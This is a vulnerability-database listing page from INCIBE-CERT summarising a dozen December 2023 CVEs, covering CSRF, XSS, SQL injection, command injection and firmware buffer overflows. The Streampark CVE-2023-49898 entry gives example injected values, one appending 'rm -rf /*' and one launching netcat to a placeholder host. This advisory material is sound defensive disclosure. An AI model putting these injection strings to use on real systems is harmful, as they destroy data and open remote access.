Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2023-50870
Publication date:
15/12/2023
In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible
Severity CVSS v4.0: Pending analysis
Last modification:
19/12/2023

CVE-2023-50871
Publication date:
15/12/2023
In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed
Severity CVSS v4.0: Pending analysis
Last modification:
19/12/2023

CVE-2023-46116
Publication date:
15/12/2023
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue.
Severity CVSS v4.0: Pending analysis
Last modification:
28/12/2023

CVE-2023-48765
Publication date:
15/12/2023
Improper Neutralization of Input During Web Page Generation (&amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Till Krüss Email Address Encoder allows Stored XSS.This issue affects Email Address Encoder: from n/a through 1.0.22.<br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
19/12/2023

CVE-2023-30867
Publication date:
15/12/2023
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like &amp;#39;%jobName%&amp;#39;. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.<br /> <br /> Mitigation:<br /> <br /> Users are recommended to upgrade to version 2.1.2, which fixes the issue.<br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023

CVE-2023-49898
Publication date:
15/12/2023
In streampark, there is a project module that integrates Maven&amp;#39;s compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.<br /> <br /> Mitigation:<br /> <br /> all users should upgrade to 2.1.2<br /> <br /> Example:<br /> <br /> ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &amp;&amp;, compilation failure use "||" or "&amp;&amp;":<br /> <br /> /usr/share/java/maven-3/conf/settings.xml || rm -rf /*<br /> <br /> /usr/share/java/maven-3/conf/settings.xml &amp;&amp; nohup nc x.x.x.x 8899 &amp;<br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
05/01/2024

CVE-2023-33222
Publication date:
15/12/2023
<br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> When handling contactless cards, usage of a specific function to get additional information from the card which doesn&amp;#39;t <br /> check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a <br /> potential Remote Code Execution on the targeted device<br /> <br /> <br /> <br /> <br /> <br /> <br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
28/12/2023

CVE-2023-33218
Publication date:
15/12/2023
<br /> <br /> <br /> The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. <br /> This could potentially lead to a Remote Code execution on the targeted device.<br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023

CVE-2023-33219
Publication date:
15/12/2023
<br /> <br /> <br /> <br /> <br /> The handler of the retrofit validation command doesn&amp;#39;t properly check the boundaries when performing certain validation <br /> operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the <br /> targeted device<br /> <br /> <br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023

CVE-2023-33220
Publication date:
15/12/2023
<br /> <br /> <br /> <br /> <br /> <br /> <br /> During the retrofit validation process, the firmware doesn&amp;#39;t properly check the boundaries while copying some attributes <br /> to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted <br /> device<br /> <br /> <br /> <br /> <br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023

CVE-2023-33221
Publication date:
15/12/2023
<br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> When reading DesFire keys, the function that reads the card isn&amp;#39;t properly checking the boundaries when copying <br /> internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code <br /> Execution on the targeted device. This is especially problematic if you use Default DESFire key.<br /> <br /> <br /> <br /> <br /> <br /> <br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023

CVE-2023-6839
Publication date:
15/12/2023
Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.<br /> <br />
Severity CVSS v4.0: Pending analysis
Last modification:
21/12/2023
Subscribe to Vulnerabilities